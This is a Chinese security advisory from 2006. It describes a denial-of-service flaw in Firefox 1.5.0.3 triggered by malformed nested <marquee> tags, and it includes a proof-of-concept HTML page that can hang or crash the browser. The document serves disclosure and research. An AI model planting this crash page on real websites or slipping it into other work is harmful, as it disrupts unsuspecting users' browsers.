首页 -> 安全研究

安全研究

安全漏洞
Mozilla Firefox marquee标签处理拒绝服务漏洞

发布日期:2006-05-30
更新日期:2006-05-30

受影响系统:
Mozilla Firefox 1.5.0.3
描述:
BUGTRAQ  ID: 18165

Mozilla Firefox是一款非常流行的开源WEB浏览器。

Mozilla Firefox对HTML标签的处理实现上存在漏洞,恶意HTML网页可能导致浏览器崩溃。

Mozilla Firefox对畸形<marquee> HTML标签的处理会占用100%的CPU资源,可能导致浏览器崩溃。

<*来源:n00b
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=114901604614510&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head>
<title>Credit to n00b..</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body>
<marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marq \
uee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee>< \
marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marqu \
ee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><m \
arquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marque \
e><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><ma \
rquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee \
><marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marq \
> uee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee> \
> </marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma \
> rquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marque \
> e></marquee></marquee></marquee></marquee></marque
e></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></m \
arquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee \
></marquee></marquee></marquee></marquee></marquee></marquee></marquee></marquee></mar \
> quee></marquee></marquee></marquee></marquee>
</body>
</html>

建议:
厂商补丁:

Mozilla
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.mozilla.org/

浏览次数:3972
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障